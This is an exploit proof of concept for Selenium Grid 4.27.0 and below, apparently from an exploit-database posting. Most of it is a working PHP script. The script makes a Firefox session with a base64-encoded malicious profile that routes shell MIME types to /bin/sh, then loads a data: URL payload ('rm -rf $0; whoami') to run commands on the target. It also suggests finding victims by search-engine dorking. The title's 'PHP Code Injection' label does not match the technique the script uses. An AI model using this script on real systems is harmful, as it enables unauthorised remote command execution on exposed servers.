=============================================================================================================================================
| # Title     : Selenium Server (Grid) versions 4.27.0 and below PHP Code Injection Vulnerability                                           |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.selenium.dev/blog/2024/selenium-4-27-released/                                                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Sends a request to Selenium Grid to check if the version is vulnerable.

    If the target is using Firefox, it exploits firefox_profile to force the browser to run bash commands.

    Tries to create a new session, then sends the payload as a command to execute.
 
[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] SeT target  = Line : 21

[+] PayLoad :

<?php

function send_request($url, $method = 'GET', $data = null) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

    if ($data) {
        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
    }

    $response = curl_exec($ch);
    curl_close($ch);

    return json_decode($response, true);
}

$target = "http://target-ip:4444"; 

$check_url = "$target/status";
$check_response = send_request($check_url);

if (isset($check_response['value']['message']) && strpos($check_response['value']['message'], 'Selenium Grid ready') !== false) {
    echo "[+] Selenium Grid detected and it is ready for exploitation!\n";
} else {
    die("[-] Selenium Grid was not found or it is not ready.\n");
}

$malicious_profile = [
    "defaultHandlersVersion" => ["en-US" => 4],
    "mimeTypes" => [
        "application/sh" => [
            "action" => 2,
            "handlers" => [["name" => "sh", "path" => "/bin/sh"]]
        ]
    ]
];

$encoded_profile = base64_encode(json_encode($malicious_profile));

$session_data = [
    "desiredCapabilities" => [
        "browserName" => "firefox",
        "firefox_profile" => $encoded_profile
    ],
    "capabilities" => [
        "firstMatch" => [
            [
                "browserName" => "firefox",
                "moz:firefoxOptions" => ["profile" => $encoded_profile]
            ]
        ]
    ]
];

$session_url = "$target/wd/hub/session";
$session_response = send_request($session_url, 'POST', $session_data);

if (!isset($session_response['value']['sessionId'])) {
    die("[-] Failed to start a new session!\n");
}

$session_id = $session_response['value']['sessionId'];
echo "[+] Session started:: $session_id\n";

$command = "whoami"; 
$encoded_payload = base64_encode("rm -rf \$0; $command");

$data_url = "data:application/sh;charset=utf-16le;base64,$encoded_payload";
$exploit_url = "$target/wd/hub/session/$session_id/url";

send_request($exploit_url, 'POST', ["url" => $data_url]);

echo "[+] Payload sent! Check if the command was executed.\n";

$delete_url = "$target/wd/hub/session/$session_id";
send_request($delete_url, 'DELETE');

echo "[+] Session deleted.\n";
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================